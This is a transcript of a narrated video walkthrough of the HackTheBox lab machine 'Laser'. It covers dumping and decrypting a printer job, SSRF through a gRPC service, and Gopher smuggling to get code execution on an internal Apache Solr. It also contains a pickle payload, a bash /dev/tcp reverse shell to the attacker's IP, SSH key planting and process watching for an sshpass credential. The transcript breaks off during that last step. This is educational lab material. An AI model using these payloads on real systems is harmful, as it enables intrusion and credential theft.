What's going on YouTube? This is IPSec. I'm doing Laser from HackTheBox, which was an insane machine, not only because of how difficult it was, but just how amazing and well everything flowed together. It starts off with finding port 9100, which is a common printer port, and you can use a tool such as the Printer Exploitation Toolkit to dump a queued print job off of the printer, and then you discover it's encrypted. However, the toolkit also lets you dump the NVRAM, which is the memory, so you can extract an AES key from the printer to decrypt the print job. That print job is just a PDF that explains how another port on the box works, which is essentially just an API. You can have that API and perform web request, and using server-side request forgery, you can make it curl your own box. And then if you smuggle in protocols using like GOPHER, you can also make it do a post request, which comes in handy because Apache SOLR is listening on localhost. And in order to exploit that SOLR instance, you have to make the box do a post request. And to do that post request, you have to smuggle in the HTTP exploit via the GOPHER protocol. It sounds like black magic, but hopefully it'll make sense by the end of this video. So let's just jump in. As always, we're going to begin with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it laser, and then the IP address, which is 10.10.10.201. Because I'm not the root user, I'm also going to run this with sudo. However, it can take a while to run, so I've already ran it. Looking at the results, we have just 3 ports open, but oh man, there's a lot of data down here. So this data is just because nmap couldn't identify the service and it's giving us the fingerprint. So the very first port we have is SSH on 22, and it tells us it's an Ubuntu server. Then we have this CS listener with a question mark, so nmap's not positive. It's on port 9000, and we can see the fingerprint says 9000 TCP. So I'm just looking at this and I do see HTTP. So I'm going to quickly just see if this is a web server. So I'm going to do curl 10.10.10.201 port 9000, and we get received HTTP 0.9 when not allowed. I'm going to try netcatting to it. So NC 10.10.10.201 9000. It's a space after that. And we just get 2 ats and a question mark. Going back to that curl, it says HTTP 0.9 when not allowed. I'm going to see, let's see, HTTP 2.0 curl. Can I do this quickly? Let's try. Oh, we'd have to compile a different curl binary for this, I think. We can see if it exists. As it -- HTTP 2. And does that do anything? If we give it a bad argument, it says unknown. So it's getting a different version of HTTP than it expects. Or maybe that's just curl giving a weird error message. I don't know anything about that port. So let's move on to the next one on 91,000, and it says jet direct. This is a printer port. So let's try connecting to it and just seeing what happens. So let's go back to our netcat and do 91,000. Can't really get anything. So I'm going to do nmap -p 91,000 -- scripts von maybe 10.10.10.201. Is it script? There we go. And while that runs, I'm going to download PRET. So GitHub PRET. This is the Printer Exploitation Toolkit. And the reason why I just did that nmap in the background, because I always like doing something in the background as I'm working. So I figured I'd show running a different nmap script. We probably should have ran that with sudo. So I'm going to rerun that. So let's see. We can go git clone and download PRET. And then let's see how we use it. So it looks like we do PRET, the target 10.10.10.201, and then either PS, PJL, or PCL. These are types of printers. Like PS, I think, is PostScript. Let's do /PRET. Does it say PostScript, PS, printer language? Yeah, I'm not sure exactly what all of them stand for. So it shows we got connected and then nothing happens. printer busy, non-PS, or silent. So I'm going to try the next one, which is PJL. And it looks like we got something. And our nmap vuln script finished. Nothing actually happened. So I'm just going to exit that. And PRET gives us a bunch of commands. So we can do ID, and we get Laser Corp. We can do like ls, and we can see directories. So it looks like we got everything working. ls pjl, and then there is a jobs directory in pjl. And it looks like maybe this is a print job, and we have a queued job. So blue means folder, I'm guessing. So since this is not blue, I'm going to do a cat, and we get a bunch of data. So I'm going to copy this data. Man, that is a ton of base 64. And we're going to save this to a file. I'm sure PRET probably has an option to save to file. I'm going to do make dir loot, make dir printer. If I could type well, I know I typoed that. That'll probably bite me later on in this video, that typo spelling printer. So that is pasting down there, I believe. So while that goes, let's go back to that ls and see if we can get the other job. So 172199 and file not found. So we have this base 64 now. Let's decode it. So base 64-g job, and then we'll direct this to just job. If we try to less it, it says it may be a binary file. So I do a file command to see if I can identify what exactly it is. And it just says data, so there's no magic bytes in it to tell us what it is. I'm going to do an xxd to look at it and see if we see anything. It's not looking promising. Let's run strings against it. And again, nothing's looking promising. I'm going to run ent to check the file entropy of this job. And we see 7.99. So that is super close to 8, which means it's going to most likely be encrypted. Another thing we could do, which I'm going to do a lot in this video, is use CyberChef. And CyberChef has a lot of these tools for us. So we're going to say from base 64. And the reason why, because we don't want to send like binary data. All these like dots don't go in the clipboard too well. That's not really a period. That's just saying it's not ASCII. I can't display it. If I try catting this file, it just, destroys my terminal. So that's what I'm going to go through the base 64. So I'm going to do xclip-i job.b64 selection, I think primary. Did that copy? Nope, that's not it. Maybe selection clipboard. There we go. So now we got base 64 and the output's down here. So we can now search this for entropy. I probably should make it bigger. I did, and then this graph showed. And this is kind of showing what it is. Standard English text falls somewhere between 3.5 and 5 right here. And properly encrypted goes 7.5 and above. So this is going to be encrypted or compressed. So there's nothing we can really do here, but printers can encrypt things, obviously. So if we go back to PRET, let's do PRET, is it ./PRET? PRET, PRET.py 10.10.10.201 PJL. So we can go in the config. So where's show question mark, help show help, show nothing. Is it info? Okay, info. I'm used to like Cisco command lines where you always type show and things, but in PRET, it is info. So we can look at various things like info config, and we can see the config, info file sys, and just take a look at this. Info ID, info memory. Let's try info page count. And this would be helpful if you're trying to monitor a printer. And you can see when people start printing jobs, and that's when you should go look at it, because this is the number of pages printed. Info status just tells us what the LCD says. I believe this is the LCD display. Info U status. Not sure exactly what that is. Info variables. And here's the thing we were looking at. This is in encryption mode AES CBC. So counter block cipher, I believe, is what CBC stands for. But CyberChef is going to help us here. So if I just type AES, we do have an AES decrypt function. We need the key, the IV. The mode is already CBC. So, and a 16-byte key is going to be AES 128, 24-byte AES 192, and 32-byte AES 256. So we got to just figure out which size key this is. So let's go and dump the memory. So PRET does allow us to do NVRAM dump. I think if we just do help NVRAM, it says what it has. But we can do NVRAM dump. And it's dumping the memory. And we got key. And then it pastes this. So right after key, we have this string. So what I'm going to do is look at this. We can do cat key, then WC-C. It's 19, so it's 18 characters and a line break. If we got rid of the 2 periods, it would be 16 characters. So let's try that. So let's go and copy this as the key. And we're going to say UTF-8. So copy this. So now we have a key. We need a IV. So it expects 16 bytes as the IV. So what I'm going to do is, where am I? Let's go back into loot, printer, and we're going to trim up this file. So if we do xxd job, I'm going to do head-5. We can see what this is. So 16 bytes is going to be an IV. IV is initialization vector. It should be a randomized number. And we see a lot of null bytes here. So chances are this is not an IV. IV generally begins at the very beginning of a crypto block. And based upon this, I'm going to guess this is some type of size. So we want to trim off the first, is that 8? 8 bytes actually. So I'm going to do dd job, dd input file job. We'll just say block size is equal to 1, and we're going to skip 8 and output file job dot trim maybe. Let's see. Output file equals job.trim. So let's do this xxd on job.trim and make sure it begins with CE88. It does. So we want to grab the IV. And the IV, we said this was 8. So 2, 4, 6, 8. So 2, 4, 6, 8, 10, 12, 14, 16. So we want to grab this. This is the IV. So what I'm going to do is say input file job.trim, block size 1, skip 16, job.iv. Okay, and we want to do, we don't want to do skip. We just want to do count is equal to 16. So now we only did the first 16. So if I do xxd job.iv, we have the first 16 bytes of that file. So now what we have to do is create the rest of the job. So we got to take the IV out. So I'm doing skip 16 job.data. And this should begin with, maybe it should do 17, because 0E I think is a terminator. So I think that's terminating the IV string. So if we get an error message, we're going to change it to 17 because of that 0E. I could be wrong there. Head -2. So yep, we begin with 0E. So let's do our xclip again. Do I still have that? We do. So let's see. I'm going to cat job.iv xclip selection clipboard. We're going to base64 job.iv actually. And we can say paste. And this is base64 data. So we're unable to decrypt with these parameters, and that's because we have the size and IV in here. So what we're going to do is go job.data, grab this, and let's see what we get. Unable to decrypt. Let's see. So I think maybe we should try skip 17. Like that. Grab that. Paste. And it's not working. Let's see. From base64. That looks good. It's unable to decrypt. So let's see, what do we have? Plus xxd job.data head -2. And this is why I like doing it in CyberChef, because it's just going to make life easy instead of playing with a Python script. It's much quicker, in my opinion, for doing these type of decryptions. So let's see. Job.trim. What I'm going to try doing is we'll go back to job. And we'll say block size is equal to 1. Skip is equal to 24. This is going to skip the first 8 bytes, which is what we called the size, then the next 16, which is the IV, and we should be back here. Base64 job.data xclip selection clipboard. Paste. See, it ends in SSQ. See, base64 job data. That's how it ends. DQP6. DQP6. Input hex. Let's try changing it to raw. And oh, there it goes. So I don't know exactly what this input thing is. I wish they had a question mark that says exactly what it is, but we have it now decrypted. So let's now copy this out. We can either save the output to a file, or you can also convert it to base64, and then that's from to base64, and copy and paste out. Stop that one. So it's up to you how you want to do it. I'm just going to save it. And we'll call this, this looks like a PDF. So I'll call this job.pdf. Save it. Probably saved in my downloads. So cp downloads job.pdf. Just going to move it. And now we have to open it. So let's go to places, and I can go home, IPsec, HTTP laser, loot, printer, and we can look at the print job. So we have this right now picture, and it looks like it's showing what this server is. So we have feed engine, printers, the cloud, web servers, embedded devices. And they all go to feed engine. So description, this is used to parse feeds from various sources, printers, network devices, web servers, and other. These feeds can be used to check load balancing, health status, and tracing. So going to the usage, it's using protocol buffers and the gRPC framework, which is the Google remote procedural call. And it uses Protobuf to send and receive data. I believe this is HTTP 2, so that's what I was trying to play with. The engine runs on 9000 by default. All engines should submit feeds in serialized format, such as data transition. So serialized to make it fast. They define the print service, which has a RPC method called feed. The method takes content as a parameter and returns data from the server. So this is the key piece right now we'll probably want. So I'm going to do v, or let's v notes, and we'll paste this. On successful data transmission, you should see a message that says it is pushing feeds. And service underscore pb2.data. This looks like Python code. Sample feed. So I'm going to copy this, and we'll just put it here. Doesn't look like it pasted well. That's a PDF, so of course it won't. QA with clients. Let's see. So this looks like they have some type of defense against pickling. And going by Python before, they don't use built-ins or other modules, so maybe we can't just deserialize something with Pickle. Bugs. Nothing really too interesting and to do. So we don't have all that much information right now. What we do have is stuff to make a request to that port 9000. And once we have the request to port 9000, that's when we can start playing with things. You can also Google like Python gRPC, and I'd recommend reading these guides. Probably maybe this. That's a lot. Probably this page would be good. But we're just going to jump through this quickly. So let's see. We first have to make the Protobuf message. So I'm going to call this gRPC, I guess. And they called it service. If we go back into documentation, they had service underscore something. So service underscore protobuf2 is what it stands for. So I'm going to call it service.proto. So we kind of just mirror what they are saying. And the start of it begins with syntax is equal to proto3. And then it looks like we chopped off on something. Why is this not moving up? There we go. Okay. So they defined a print service which has a RPC method called feed. So the print service, let's do service print. And then we want to do RPC feed. And it takes content as a parameter and returns data. Okay. And then the next thing we have is to define content and data. So message content, and I'm just going to say string data equals 1. And then we'll do the same thing. I can type, there we go. And this time I'm going to say, instead of message content, we can do message data and string feed equals 1. And that looks fine. Clean this up a little bit. And at this point, you want to install gRPC IO tools. So like pip3 install gRPC IO -tools. But I already have this installed. And that's going to give you a command. Let's see. I don't know this one off the top of my head, but it is in one of these pages. So it's the -m command for Python. Python 3-m. Is that here? Python 3, Python-m. So this is what we want to do. And we'll go over this as soon as we copy it. I always specify Python 3 because I think my default is 2 still in this OS. Always better to define the version. So we're using the module grpc_tools.protoc. -i is going to be include, and I'm just going to do the standard folder. And then we have a Python out. This is going to be where it writes Python files. And again, where it writes Python files. And next, we have to have the name of the Protobuf file, which is service. So now what that did was it created service_pb2 and pb2 grpc. So if I look at these files, they're just Python libraries, so we can use the Protobuf 2 stuff. So now we want to, let's see if I can use Codium for this. So new file, I'm just going to do touch exploit.py, file, open, and we'll do, where's laser, grpc, exploit.py. Okay, so I want to do my imports. The first one being grpc itself, so import grpc. Then the next thing we want to do is probably import service_pb2, and then import service pb2 grpc. We'll probably need to do request potentially. So I'm just going to import that just in case I need it. I don't think I do. Maybe I do. And now we got to open the Protobuf channel. So channel is equal to grpc.insecure channel. This is going to go over not HTTPS 201 port 9000. And then we can do stub is equal to service like that dot print stub channel. And now we want to send data. So we can say response is equal to stub.feed service pb2.content, and we'll say payload. And we should create payload is equal to test print please subscribe. Let's see, there we go. F5 Python file, is this going to run? For some reason, this is the error message I get sometimes when I do Visual Studio code and this VM. I don't know what I did to deserve that one. So I'm just going to run Python 3 exploit here. And let's see, positional arguments allowed. Let's see, stub.feed, service pb2.content. Oh, we give it the data. Where is this? This content returns data. I think that's correct now. Nope. Wait, did not save. Okay. So now we have a message. Exception calling application, invalid load key. So let's see what this error message is. And I'm not going to do Visual Studio because that's now giving me issues. Let's see. So this is a pickling error. So let's try to pickle this. Very first thing, let's try a deserialization attack. So I'm going to do import pickle. And then we want to do class, and I'll call this please subscribe def reduce self. And I think we did this in Canopy. Return os.system, and we'll say curl 10.10.14.3, and I think that's good. So now we can say this data is equal to payload. We're going to do pickle.dumps like that. And now let's send this and see what happens. Has type string but is not valid UTF encoding. So at this point, let's try base64. So import, we'll say from base64, import b64 encode. And we can encode the payload. So b64 encode payload. And let's see. Exception. Something happened. Expecting value 1, line 1, column 1. Let's see. Let's do pickle dumps. I forgot to change this to our RCE. So we can say pickle dumps, and we'll say please subscribe. And we should do nclvnp on 80 because we have the pickle command as a curl. So if we get code execution, it's going to curl our server. OS is not defined. Maybe import pickle OS. And we get module is disabled. So doesn't look like we can do that type of exploit for this. So in the PDF, they had mentioned in the QA, they place controls around what gets unpickled, and they don't use built-ins. So the next thing we probably should do is try taking a this JSON data. So let's grab this, and we'll send the sample to the server. So let's say def gen payload, and we'll say JSON is equal. That is messy. Maybe it'll work. We don't need a variable. Return JSON. So we're going to try to send this JSON string. So gen payload. Must be string or bytes, not dict. So let's see. Wonder if I put this in quotes. Will that work? And something's happening. We're not really getting a response back. And let's see. Could not resolve host printer.laser internal.htb. If we look at this, we do have homepage and feed URL here. What I'm going to do to try to make this easy is we're going to copy exploit to exploit.back. And then I'm going to delete some of these JSON keys. Because it would be nice if I don't have to have this whole payload in every request. So let's take feed URL. Do we still hang? We do. Awesome. So let's try changing this to be 10.10.14.3, which is my IP address. We still hang, and I don't see a request. So let's try the feed URL. 10.10.14.3. And we actually get a hit back. So now we have the server downloading something from us. What we could try doing is I'm going to add a K. And what the K did was it's going to keep the socket open so I can do multiple things. We can now exit the notes. We don't need those anymore. We can try like basic command injection here. So who am I? Like this. And run the exploit. Doesn't look like that works. We can try putting like backticks. Nothing works. We can see if we can do other feeds. So 443. So we can do HTTPS. Let's see, is 21 FTP? Let's try FTP. Does that work? It does. So we can do various things. This is Python, so I don't know if there's anything we can really do in order to get this to download and execute code. The one thing that's generally good to do whenever you can make a server make a request is see if you can make a request against itself and do some type of port scan. So let's just try HTTP, localhost, and see what this responds with. So Python 3, exploit, and we get failed to connect, connection refused. If we try localhost, it was listing on port 22 for SSH. Let's see. Received HTTP 09 when not allowed. So now we definitely know we can do some type of internal port scan on this guy. So let's see. Locate top 1000. Is there an nmap? Let's see. Nmap top 1000 ports. looking for that list file. Let's see. That's top 100. So Google top 1000. Okay, let's just do all ports. This is going to take a long time to do, probably. So we'll do the first 10,000. So let's go to exploit.py. And we'll probably want to thread this. So the first thing is to clean up the code a little bit and then be able to identify when a port is opened or closed. So there's that. Let's say gen payload port. And we can change this to be port. And this has to be an F string. Okay, 1, 2, 3, 4. Yank 4 lines. Go here. And we'll rename this to be check port. I think that is good so far. And we can return response. And we can say try this, and say accept exception as E. And we can say return E. Let's see what happens here. So let's do check port 22. If we run this, we may want to print gen payload's not defined. So this is just going to be JSON now. Okay, exception calling application. Something happened. Let's see. I wonder if it doesn't like, let's print JSON real quick. Yeah, it did not put port like we thought it would. Because now this whole blob is a string, so we put the format string there. Valid format specifier. Let's see, feed URL plus port. There we go. Try this. Okay. So HTTP 0.9 when not allowed. So let's see. If HTTP in E return open, else return closed. Let's see, not iterable. Let's see. If we convert it to a string. There we go. So now let's try, I'd say 9001, but is that, no, it's 9100. So now we have a way to tell port open and closed. So we should be able to now script this out in a thread and check a bunch of ports at once. So to do that, I'm going to import another module, the concurrent.futures. So import concurrent.futures. Okay. If you're confused what I'm about to do, it's pretty much the code off of, what is it? Zeta. Yep. This is pretty much what I'm going to be doing. So let's see. With concurrent futures thread pool executor, max workers is going to be, we'll say 20 threads. The jobs we have for port and range 0, let's do 10,000. Jobs append executor.submit, check port and port. Okay. For future and concurrent futures as completed jobs, port output is equal to future result, print port output. Let's see. There's no way this works first time. Let's see. Return. I'm returning the port first, so we'll say port like that. Port unknown. Concurrent has no. There we go. So you can only concatenate string, not int. Let's see. Port equals str port. Sweet. So now take that out. There's no way it's going that fast. Where's 22? It is. Let's do 30 threads and direct this to result. So let's see if this actually finishes quickly. I did T, so it writes it to the file as it finds it. Alternatively, I could have had like Python start dumping this to a file, but T is the quicker way to go. So seeing a bunch of things closed, 22 is open, so it is promising that this is actually working. We'll find out, I guess, if there's anything else open. We should see like 9,000 open, but it just jumped past the screen. So I can grep open on result, and we have just 3 ports. Didn't give us anything else, but I guess it is fast enough where we can make it take about a little longer. So I'm going to run this and we'll see what happens. And now it is done. So let's grep again. And I'm going to try just saying everything that's not closed. We have a few ports that are unknown, 8983 and 35821. So I'm going to manually look at that and see exactly what that error message was. So cp exploit.py. I should have called this checkport.py or something. We'll have to modify exploit later. But we can comment this out. That. Whoops. For some reason, this VM doesn't like my escape key. This happened more than once this video and previous videos. So check port, and we want to go 8983, I think it was. And here we can just say print response. Python 3 check port, and we didn't specify a. Oh, we did. Okay, it just says pushing feeds. So I don't know exactly why, but the program did not error out. So I'm guessing that port is open. And if we go to Google, port 8983, see, we see it is SOLR. This is an Apache product. So the very first thing I'm going to do, Apache SOLR exploit to see if we can do some type of like protocol smuggling and send an HTTP request to this and exploit it through this server-side request forgery. The server-side request forgery is us making the server make a request. And looking at this, does not look like it's going to be trivial. So if we look at the requests, I would love to be able to identify what version of SOLR is running on this box, or even if it's SOLR to begin with, but this is kind of blind. We only can tell Booleans. So this is a long shot. But when you have services listing on localhost, it's not out of the ordinary that they wouldn't be updated. So this is doing a post request. In order to do the post request, we have to do some type of protocol smuggling because we can only make the server do a GET request. So if I did 80 and we go back and edit this check port, I probably have it up here. Yeah, it's doing GET requesting. So we have to make this do a post. And we already know we can make it do things other than HTTP. When we tried with HTTPS and FTP, there's another protocol called GOPHER, which is super common for smuggling things. Because you can just write raw data to it. So I'm going to go back to CyberChef, and this will be probably more obvious once we do this. So let's clear our recipe. And we want to send post, please subscribe, what was it, HTTP 1.0? Is that a HTTP request? Let's see, 1.1. And then we do like host, localhost, 9001, I guess. It doesn't matter what port. I just want to show we can actually write data. Content type, application, JSON, invalid header, and we want to write something like that. So we can convert this to URL, and let's try doing this GOPHER thing. So NC LVNP, I'm just going to do it on port 80. And let's see, gen payload, we can say payload, and let's see, HTTP, so we can say this is going to be GOPHER localhost 80, and then payload. So let's say like that, plus payload. That looks fine. Return JSON see, channel, stub. I don't really want this. I just want to see everything. Print response. Okay. And we'll say payload is equal to gen payload that. Okay. So if we did this correct, what's going to happen? Oh, I already had everything down here. We're going to connect to the RPC service, get ready to send data. We're going to have this craft us a malicious JSON, which is going to do GOPHER. We want to send it to us right now. So 10.10.14.3. Us on port 80. And then GOPHER begins with the slash, and then anything after that is going to be just written to the socket. And we're just writing this to the socket. So let's try Python 3. I still called it checkport. The names of these files are going to be horrible. So we can see we connected, and then we are just writing raw data to the socket that we connected. And this is us sending a post request via GOPHER. If you want a good article, Orange Sci Smuggle, I think. Let's see. Yeah. This is a good one. He mentions like Black Hat Talks and things like that. Highly recommend, if you're confused what I'm doing, watch that, because that's the best resource to learn this type of smuggling. So CP check port. We're going to call this exploit now because it no longer checks the port. So let's see. So we have to go back to this SOLR thing and figure out exactly what this is sending. So try JSON dumps payload. So it's sending this. So we have to send this payload, and we got to get the correct URL. So where's CyberChef? We want to send this, and I'm going to put this all on one line, just so it's easier for us to deal with. I don't think we have to because we're URL encoding it, but again, I think most situations, getting payloads to be as small as possible with as many like random potential bad characters is good. So I think that is correct. So you have to send a post and see what this URL it's sending to is. Where is this? Just going to clean up my tabs. Okay. So net node. So we need self.url. HTTP IP port SOLR node. A node. Let's see. Admin cores. Oh, I remember what this was. This was one of their long shots. Merge staging core to feed engine. This is actually the hint at there's a staging node inside of SOLR. So the actual payload It's going to be SOLR, staging, and then where is the exploit? I think config we said. So SOLR, so staging /config. Where is, I gotta get used to having like CyberChef not as an application. So there we go. The port was at 8938. This doesn't really matter. Content type, we don't want to send invalid header. Content length, I don't think this is needed, but I mean, it's something that we should always put. Echo-n. Let's see, it's not using double quotes. WC-C 215. Okay. So let's try this. And our payload, like that. And this should still send it to me. Python 3, exploit, invalid syntax. Let's do a double quote and hope it doesn't interpret anything. Okay, so now we are sending JSON data. So let's do, and what this piece of the exploit is doing, it's just configuring this piece of SOLR to be vulnerable. So we don't do any actual code execution yet, but that is coming. So 10, 10, 10, 201, 8938. We can run this. Let's see. Fail to talk to port. V check port. Do I still have it? Grep unknown result 8983. V exploit 8983, and I will, oh god, host localhost 8983. There we go. Let's run this. Failed to connect 10, 10, 10, 201, 8983. Oh, we're doing localhost. Localhost. There we go. So we're not getting a response back, but it's probably doing something. The other thing that could be happening is we may not put a line break at the end of our HTTP request. And in that case, like the HTTP request could just never be completing. So we have some things we have to play with there. If you want to be sure that wasn't the case, you could go exploit to, and we could change this back to us and say 10, 10, 14, 3. Python 3, exploit 2, and start a web server and make sure it makes a post request. 8983. And since it does make a post request, we know our HTTP request is fine. So this should be fine. So let's go back to exploit.py. And this one should be good, actually. We now need to, since this one hangs, I'm actually going to use exploit 2, change this back to localhost, And we're going to see if we can get the code execution piece. So that will be the next piece, localhost. And if we go back to this SOLR, request. So this is getting the node, and this is system. So SOLR admin info system. That's not it. Okay, RCE, init node. This is doing the configuration to make it vulnerable. And then here we're doing a command. So what I want to do is I'm going to open up a new CyberChef window. That's it, /CyberChef. And paste this, and we want to URL decode this real quick. It's just easier for me to edit this way. Okay. So we're going to get rid of all these quotes and put this on one line. And be cognizant that these end with a space. So I think I'm doing it correctly. That's not ending in a space. I don't like this. Let's see. Maybe just copy it line for line. Okay. Probably could just say this. This would be quicker. Feed. Let's see. V d.py paste string is equal to this. Self command. We'll say execute code here. Print string. There we go. Python 3 t.py. There we go. That's much better. So we can copy this. And actually, let's just URL encode it. I don't know why I did that. Convert it back, and we'll send this. Enter exploit 2. So let's see, payload. And this is an actual HTTP GET request. So we don't have to do this GOPHER thing. So feed URL. This can be HTTP localhost. Where's it going? This one is self.url. It's not the same thing, right? HTTP IP port SOLR node. So SOLR staging. And let's see. And let's go back. And the end of the URL, it's actually doing select question mark. So we have it. If we, I don't know why that just decided to copy. If I paste, there we go. There's no single quotes, so that should be good. And payload is equal to that. And let's see, execute code here. Let's do plus payload plus that. There we go. Solo staging payload. I think that's good. So this will no longer be all of that. This will be a command. So we'll say curl 10.10.14.3. I don't know if I have to URL encode this or not. Let's try not first. Okay, let's see if this works. Python 3 exploit 2. War on port 80. Pushing feeds, nothing. So let's run exploit.py, Python 3 exploit 2. We have to go into gRPC, Python 3 exploit 2.py. And nothing's happening. So I'm guessing it did not work. So v exploit 2.py. And what we're going to do is put a plus here. So now it's URL encoded. And I'm always running this config thing first before I do this. Did not work. So let's see. Let's print payload. See what it sends. So looks good. We can try %20 instead of the plus. I don't think that matters. But it's always good to try the easy things before you go and try the hard things. So we're still not getting anything. Let's take a look at the whole JSON string. So let's see. Print, we can say JSON. And how's this looking? Localhost, we got 2 slashes. I could do it, maybe. So JSON staging plus payload. So rerun this. That didn't do it. It could also be our very first exploit that is failing. It could also be there's no curl in this box. There's a lot of things this could be. I am 10.10.14.3, right? Yes. So 8983 SOLR staging payload. Let's see. What I'm going to do is we'll just hard code everything. No, we don't have to do that. That's definitely working as expected. Let's see. Run this. Exec curl. Yeah, that's definitely working. And I know we can get to our port 80 because we did it through just regular HTTP before. We just haven't done it through this code execution. Let's see. If I change something in this exploit.py, let's see. SOLR. If we had the node name wrong, if it wasn't staging, does it still hang? It does still hang. Let's see, if we have SOLR wrong, it hangs. So it could be in this piece of code that we have the mistake. I was taking it just taking a while to be working. Let's see. Content writer, content type. So 7B. So I think this is the bracket. Yeah, 7D is closing. What if we have to put like single quotes before and after it? That wouldn't make sense. Let's send this to CyberChef and see what the JSON looks like. We don't want to edit anything. Exploit.py. We did. We have not SOLR still. Not. Delete that. Delete that. And let's copy this and see what you look like. Do we have it here? I think I already had it. I think this is it. We'll be sure. URL decode. And let's see. Oh, I think I'm forgetting a bracket. We have one starting here and only one there. But yeah, there's an unbalanced brackets. %7D. Let's try this. Let's add that %7D in exploit.py and see what happens. %7D. There we go. Python 3, exploit.py. That goes really fast now. Did we screw something up? Localhost 8983. SOLR staging. Let's see. Python 3, exploit2.py. Still not hitting us. Let's see, feed, SOLR 8983, and we're doing a curl. Let's see. Let's just redo this whole piece. Let's see, where is the JSON blob? Sorry for all the scrolling. There it is. So that was my mistake. I just grabbed this. I did not grab this. So let's go. Copy. Paste. Oh, I probably could have just added that at the very end. I wonder if I need like a 0A. %7D. We'll just do this. Let's see. Can we do like online JSON pretty? Formatter and validator. Let's see. There we go. Let's paste. Okay. SOLR staging config. Echo-n. Paste. WC-C. 206. And we want to encode. Okay. Now I can try this. Maybe exactly what we did. Python 3 exploit.py. It's taking longer. So exploit 2 still not working. This is a painful exploit if you can't tell. Whenever you do protocol smuggling, things just don't like working. 8983. SOLR staging. Should be calling back to us. See, let's get rid of this format string. Is that changing anything? It's not. Let's see, payload. Do curl plus. Nothing. We can try wget. You can get rid of the plus and just do a space. But I have a feeling that's going to break all sorts of things. Let's see. Let's make this get a request to us, actually. So payload, feed URL. Let's go 10.10.14.3. And we want to listen on 8983. Okay, what does this look like? Does that really stop? What? 8983. Is that just my Python web server stopping? No, it stops after custom. That doesn't look right. What is custom? Let's see. Doesn't like that end. So select question mark. We probably have to URL encode all that. Let's see. Let's go back to CyberChef. URL encode. All special characters. So instead of wget, let's just do execute. See if this is any better. just add a K here. Okay, that looks better. Whereas execute plus payload. There we go. And the feed URL, we want to go back to localhost. And we'll say curl. Run this. Still nothing. Let's see. Wonder if I should just encode the ands. Because now I may be encoding like the equals that we didn't want. Maybe it's best not to use CyberChef here. Let's just try rebuilding that URL completely. So let's go Python 3, t.py. If you remember what t.py was, that was just us copying the code out of the exploit and bring it here. So let's go back to exploit 2 and paste this. V exploit 2.py. It's in cd gopc v exploit 2.py. And we can delete this. Paste. Okay. So execute code here. This is going to be our payload. Plus command plus. Let's see. Let's do single quotes instead of double. I wonder if that could have been it. I wonder if I was doing double quotes. Okay. So let's just try this. Leave it with that. Python 3-m. Okay. Python 3 exploit 2.py. Command is not identified. We want to do payload. Still nothing. Let's see, feed URL. Let's make this one come back to me. So HTTP 10.10.14.3 8983. Is it still going to stop? No. That's good. So at least we solved that problem of it stopping like right here. I think that was because that was an and. So curl. Let's see. So we go back, change this to localhost. Can't believe this is giving me so much issues. Localhost. I really have the feeling that it's going to be something super, super stupid. And it's going to cause me to want to redo this whole portion of the video. But I feel like the troubleshooting may be valuable to someone. Okay. Exec payload. Print JSON. Let's run this again. So a JSON validator we can use. JSON formatter, and validator. Okay, it says it's valid. So it looks like our encoding is fine. SOLR, staging, select. Let's see. We open the channel. Yep. Gen payload, pickle dump, base64. Okay, that looks all good. Let's see. Wonder if we can like sleep 15. I was hoping it would take like 15 seconds to return, and then we can verify it's just like doesn't have curl, doesn't have wget, and it's weird like that, but that doesn't seem to be the case. We can try sleep plus 15, but oh, that's promising. So did that just work? Let's try curl again. I don't know what I did. Curl 10, 10, 14, 3. There we go. We finally have code execution. So I don't think it likes the %20. Was that it, really? Was it the plus? %20. Does not like that. Space. Does not like that. So yeah, it wanted a plus for a space. So it's probably a combination of us having bad JSON in the very first exploit, this one right here to begin with, because I did try changing to a plus. And then after that, what? Hold on. Okay. Make sure I'm not crazy. Run this. Okay. So yeah, it was probably a combination of the very first exploit having bad JSON. So now that we have code execution, let's see. We can curl. Let's just drop a file to disk because it'll be easier. So make dir dub dub dub, and then v shell.sh bash bin bash, do bash dash c bash dash I dev tcp 10 10 14 3 port 9001. There we go. There we go. NC LVNP 9001. So we can download this real quick. -o dev shm shell.sh. Run. We have downloaded it twice. Not sure why, but let's see if we can execute it. Bash dev shm shell.sh. Probably need a plus. There we go. About time we have a shell on this server. We are this SOLR user. So what I'm going to do is go in my home directory, and I think there's a .sh. I'm going to put an SSH key here. So let's do sh-keygen. Let's go up one directory. -f SOLR cat solr.pub, and let's echo this into the file. To authorize keys. Okay. chmod 600 SOLR, and we can clean all these shells up. sh-i SOLR, SOLR at 10, 10, 10, 201. What? Cat SOLR, cat solr.pub. Let's do rm authorize keys echo -n authorized keys chmod 600 authorized keys. Okay. I don't know exactly what I screwed up before, but now we have a proper SSH session into this box. The first things I like looking at before I even run linps or anything is like what groups I'm a part of, what the sudo rule is, was the AUX -- forest maybe. The processes running on this box. So we can see this one is me. We have a reverse shell, which is me. Let's see. Home SOLR feed engine. So I'm going to go into this directory, and I'm also going to, let's see, sudo-u printer. That's running as root. So this is probably setting up the 9100 emulation. Printer is running this script. Cat opt updates run.sh, permission denied. That script just does sleep 10. So if we just kept running this force command, let's see, grep 2608, grep run.sh, and we can say -a1. Maybe A2. I was hoping we'd get the sleep. Maybe 1688. Or let's just grep run.sh -a2 watch. So we watch this command. We may be able to see like this sleep run different commands. So we can see right there off the bat, oh man, run.sh did SSHPass. So if we wait again, I actually did not expect to see it like that. I was expecting to have to run like PSPY or something, but we're just gonna let this go, and every second or every 2 seconds, let's change this to, can we do like -n.1? So we can see what this script does. Sleep 10. So what I'm going to do is, instead of the watch 1, because that's clearing a terminal, I'm going to do for I in sequence 0 to an insanely large number, and then sleep 0.1. Done. Let's see, we forgot to do. do, and I can get rid of this quote and that quote. And let's see. Do temp output. Okay. sh-i SOLR at 10.10.10.201. cd temp cat output. So now we can do this. We can grep for SSHP, and we can see that SSHPass. Now, I don't think that's the password of all Z's, but we can try that. We can also grep for SSHPass and grep-v the Z's to see if there's anything else. There isn't, but we can try logging in with this. So SSHPass -p Z's update. I don't know where that's copying to. So in this for command, why don't we just get rid of this grep and just do the ps command. And then we gotta wait 10 seconds. In 10 seconds, we'll definitely probably guarantee this SSHPass ran because it said it was happening every 10 seconds. Okay, grep SSHPass output. And we can see it is going to root at 172.18.02. So we can see everything that's happening. But we still have this issue of only seeing Z's. But we can try logging in to see if this works. And we get permission denied. So SSHPass does have an ability to like overwrite this variable. So it's kind of like process spoofing in Windows, where after it runs, it goes and clears out this. So let's see, password. So doing -p. 